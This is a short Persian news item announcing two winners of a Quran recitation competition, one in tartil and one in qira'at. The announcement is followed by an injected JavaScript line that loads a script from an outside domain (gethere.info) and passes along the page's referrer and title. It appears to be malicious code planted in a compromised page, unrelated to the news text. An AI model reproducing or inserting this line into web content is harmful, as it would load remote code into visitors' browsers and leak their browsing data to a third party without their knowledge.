کسب مقام اول رشته ترتیل توسط علیرضا نوده فراهانی و کسب مقام سوم رشته قرائت توسط علی دلال شریفی معراج سیزده ب-مسابقات نهایی قران کریم

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;